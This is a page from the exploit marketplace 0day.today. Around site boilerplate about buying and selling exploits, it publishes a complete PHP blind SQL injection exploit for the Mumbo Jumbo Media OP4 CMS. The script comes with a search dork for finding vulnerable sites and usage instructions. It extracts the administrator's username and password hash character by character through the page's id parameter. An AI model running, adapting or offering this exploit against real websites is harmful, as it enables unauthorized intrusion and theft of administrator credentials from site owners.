0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit
======================================================== Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit ======================================================== <?php ini_set("max_execution_time",0); print_r(' ############################################################### # # Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit # # Vulnerability discovered by: Lidloses_Auge # Exploit coded by: Lidloses_Auge # Greetz to: Free-Hack, GPM # Date: 13.04.2008 # ############################################################### # # Dork: "mumbo jumbo media" + inurl:"index.php" # Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID] # Example for "http://www.site.com/cms/index.php?id=300" # => php '.$argv[0].' http://www.site.com/cms/ 300 1 # ############################################################### '); if ($argc > 1) { print_r(' '); echo 'Searching for Admin: '; for($i=1; $i <= 50; $i++) { $temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--'); if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) { $adlen = $i; $i = 50; } } for($i=1; $i <= $adlen; $i++) { for($zahl=48; $zahl <= 122; $zahl++) { $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--'); if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) { echo chr($zahl); $zahl = 122; } if ($zahl == 57) { $zahl = 96; } } } print_r(' '); echo 'Searching for Hash: '; for($i=1; $i <= 32; $i++) { for($zahl=48; $zahl <= 102; $zahl++) { if ($check = 0) { $temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--'); if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) { $zahl = 97; $check = 1; } } $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--'); if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) { echo chr($zahl); $zahl = 102; } if ($zahl == 57) { $zahl = 97; } } $check = 0; } } ?> # 0day.today [2024-12-24] #